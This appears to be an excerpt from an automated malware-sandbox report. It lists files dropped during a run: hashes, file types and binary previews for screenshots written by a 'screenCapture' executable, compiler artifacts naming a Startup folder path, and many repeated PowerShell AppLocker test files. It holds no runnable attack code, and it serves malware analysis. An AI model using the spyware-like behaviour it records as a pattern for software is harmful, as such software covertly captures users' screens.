                                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVak7YnqqJPN5Dlq5J:+RI+ycuZhN3akSJPNnqX
                                                                                                                                                                                                                                    MD5:DAB0EB2E4068A391BA3919CFD6D82E76
                                                                                                                                                                                                                                    SHA1:A79DAB56704276D81C643E5DA831417D48BA3E61
                                                                                                                                                                                                                                    SHA-256:C6984129276F315F6F6D06272C916B06A0087EFB9A258870E43235CA03F89C08
                                                                                                                                                                                                                                    SHA-512:1FF633FDB1F0AE4CA821044278F6AB8E29592849345B3FCB4C403C5F7FE598C1C7FE2F4BDB819BB3BC8251D4DF2C24CEB1A47FEFE37F1C40599DFA865DB54F07
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.d.1.q.d.k.x.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.d.1.q.d.k.x.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1265698
                                                                                                                                                                                                                                    Entropy (8bit):7.952269399870416
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:1wi1Kv/Lm9t8jXgwKdW4d1itUdFvhUsXTRSZJ92b6MgIJUjkeN6Bz+BZAID:B1KvMYKdYaXcnkb6MXJUjkYwCBZBD
                                                                                                                                                                                                                                    MD5:D6D77045BF9FE1D3932EB12C87FA5CCD
                                                                                                                                                                                                                                    SHA1:EC2C1C63FC653F3C3208D77377DDD85049A55232
                                                                                                                                                                                                                                    SHA-256:FD063CF06C03E3FDCF4D46E1FE04195E45B468C250E64C5E7F514AF48A5CDDB3
                                                                                                                                                                                                                                    SHA-512:08BA3A88F472CAF4FCDFE75CC6EB66BCF9424C03053865EB5740B7DBE63C735C6708176284FAB89BB459DA692E710154039EEDECB9D2FDDC71937ABDE9542BB5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g...u..Vw....;?.tc..bwf...Xz...{.I...=)C...5.3#......J.V... ....'hA.:.....|.............Df.<.oVu}XM<{..t>.h3...|8.xb8g=..!.~F0..g..L.B...qv.q.._....'..3s....;.W.O6.X{.v.}...s.n..T3w..l.M...X..>Z..1...y.../.03..3.>..~....$;.8d{f..\....3..N.f......x...6.....w?.........-+..03.*..2...O.2.7.,........e....4Uf.[9..:.Y.0.W.\...e.).....bv.....+.?.A._.x^...:....8f>...t..{i<2j.....?z`B.3.3...E...oUbl...;...\...............s'.`...9.qr3f......{....{.2../..{...s....w~..wt...d.._MY...c.m.1../O..o...o}i.s#.}........{....}.*..lg.x_..c.....t^.Oe....{..o(.x}.-.Q.]..6.....~w....x.{+.....!V.~;.x...s...C.{.]....N......;....[0.fO......}..y.;....|{...{+..N...T....om.Z..`....j.....c.B..1........=.f..6.O..B............].5'..pke...*3..R..\>.q7.y.N)..q..y.;..f..5..w..5'....{C..|w...K..'.....S3{.u~..4k.+....753G.X[..O*.>...s..M.....'.g..o.s.K.\Y.kX[X{...:.(-.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1265733
                                                                                                                                                                                                                                    Entropy (8bit):7.952250651915573
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:1wi1Kv/Lm9t8jXgwKdW4d1itUdFvhUsXTRSZJ92b6MgIJUjkeN6Bz+T1o:B1KvMYKdYaXcnkb6MXJUjkYwCho
                                                                                                                                                                                                                                    MD5:908D34BEA622177DCF1E138E9209ACFB
                                                                                                                                                                                                                                    SHA1:38259D394B2E5C28650ACD025F1041CEFE8C8FAD
                                                                                                                                                                                                                                    SHA-256:64558267B65BB90E08A1994D7825746D66D786E12A39847A62C50CA43E9125B5
                                                                                                                                                                                                                                    SHA-512:FA513FC8324211556B0AB16C890F3042F85CFE6867B3397A30FA2BE07CD95C5972736EB13EBC48562CC0964575451156B69C239DC326105F3ACF9CEAE6826BB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g...u..Vw....;?.tc..bwf...Xz...{.I...=)C...5.3#......J.V... ....'hA.:.....|.............Df.<.oVu}XM<{..t>.h3...|8.xb8g=..!.~F0..g..L.B...qv.q.._....'..3s....;.W.O6.X{.v.}...s.n..T3w..l.M...X..>Z..1...y.../.03..3.>..~....$;.8d{f..\....3..N.f......x...6.....w?.........-+..03.*..2...O.2.7.,........e....4Uf.[9..:.Y.0.W.\...e.).....bv.....+.?.A._.x^...:....8f>...t..{i<2j.....?z`B.3.3...E...oUbl...;...\...............s'.`...9.qr3f......{....{.2../..{...s....w~..wt...d.._MY...c.m.1../O..o...o}i.s#.}........{....}.*..lg.x_..c.....t^.Oe....{..o(.x}.-.Q.]..6.....~w....x.{+.....!V.~;.x...s...C.{.]....N......;....[0.fO......}..y.;....|{...{+..N...T....om.Z..`....j.....c.B..1........=.f..6.O..B............].5'..pke...*3..R..\>.q7.y.N)..q..y.;..f..5..w..5'....{C..|w...K..'.....S3{.u~..4k.+....753G.X[..O*.>...s..M.....'.g..o.s.K.\Y.kX[X{...:.(-.
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                                                                                    Entropy (8bit):3.09174077927609
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryoak7YnqqePN5Dlq5J:+RI+ycuZhNWakSePNnqX
                                                                                                                                                                                                                                    MD5:55438BBB52D8509DBECF5B01FB8B761E
                                                                                                                                                                                                                                    SHA1:EBCABF092D5F57F9829B9580FA4D2FC4975F12A8
                                                                                                                                                                                                                                    SHA-256:71E91C5A496439F800975A09319E2350D074668176E33649E9DDF6996FD7C0EE
                                                                                                                                                                                                                                    SHA-512:5167065D72EEEE69C21E467119820BAAF3E4FE55AF459163F1354FA518D162FF62B7285B308E6DE21A1D17C44B54FEB054FAA97D76E83243CECBAAC3A4E44AE4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.y.d.y.h.i.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.y.d.y.h.i.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Tue Oct 1 16:22:59 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1380
                                                                                                                                                                                                                                    Entropy (8bit):4.0800226350792315
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:HQjDW9CXYLNHTfwKfuVMONwI+ycuZhNWakSePNnqSGd:eXYLNUKfu9m1ulWa3CqS2
                                                                                                                                                                                                                                    MD5:6E74D6439C1591B74BBD9D26ECDF8561
                                                                                                                                                                                                                                    SHA1:EF3629DE8A66520D4828BC5B7B5D887FE43497EE
                                                                                                                                                                                                                                    SHA-256:32E4A6C501556074D4543E295743C318952E8B32C296C74974599EAC4A68B887
                                                                                                                                                                                                                                    SHA-512:C5AEA6DD34DAE51B7EBFD27D787272BF82588991ACB99B74B4EFBECBBFC0DC9E63C68201E0677BF68D4C36BCD795C8B35F34BD0958DA1A3E144E9EC32D69AB85
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:L....!.f.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........L....c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP...............UC..R.P...[...v...........5.......C:\Users\user\AppData\Local\Temp\RES25A2.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.y.d.y.h.i.b.p...d.l.l.....(.....
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Oct 1 16:22:07 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1332
                                                                                                                                                                                                                                    Entropy (8bit):4.011933872375763
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:HHl2jzW91vT3G3HDwK1mNII+ycuZhN3akSJPNnqS2d:lTTW30K1mu1ul3a3rqSG
                                                                                                                                                                                                                                    MD5:6CF8E8F2615DDB823B43FC3CB86D980F
                                                                                                                                                                                                                                    SHA1:9145158B86316401F997CD6CEFD7DE9E4E3A4D84
                                                                                                                                                                                                                                    SHA-256:7FD0F7511B1B5FAB87472B0E6864B946EBA84DFDAA4805B365E73BA880F4F026
                                                                                                                                                                                                                                    SHA-512:F45A98266DC5F68E12772C4450E3FD6E1B607C7C5F4450D2EB5A40B5BACC59E91C141A4892C189E28073147E683475A7D653484771940C9A3910B2A80F5FDA46
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:L....!.f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP..................@h...9.....v..........5.......C:\Users\user\AppData\Local\Temp\RES5D70.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.d.1.q.d.k.x.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x684, 10 symbols, created Tue Oct 1 16:22:41 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1852
                                                                                                                                                                                                                                    Entropy (8bit):4.46748243513511
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:H1+9bUYQE6H/wKBTfIl2xDEuZhN9utaEYiPNnquVm4+A8AlAlPC:KU+6oKBTwl2uulAtVYuquV8El9
                                                                                                                                                                                                                                    MD5:E4090B983633D7E0509D5E176CC330FE
                                                                                                                                                                                                                                    SHA1:C25C6FEAB9DD864BBF73037F604F56C65D2C7AE3
                                                                                                                                                                                                                                    SHA-256:B94BAC0E8E8F34AAB11284F6B683671F1E25099FF45F148CEA61FB1931F95621
                                                                                                                                                                                                                                    SHA-512:F1EBD8ABEBE64923958BBFBF6627EB4054F9D4EB71675E3837A54099F4A717AAACB66C9D75CA7EF13A2CEA2CB91FA0FF07AA77F41BCCE524876031AF79A6ECD1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:L....!.f.............debug$S........l...................@..B.rsrc$01............................@..@.rsrc$02............................@..@........X....c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP...................$g.T...F.............5.......C:\Users\user\AppData\Local\Temp\RESE2DC.tmp.-.<....................a..Microsoft (R) CVTRES.v.=..cwd.C:\Users\user\AppData\Local\Temp\screenCapture.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................t...............^...............................t.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...P...
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
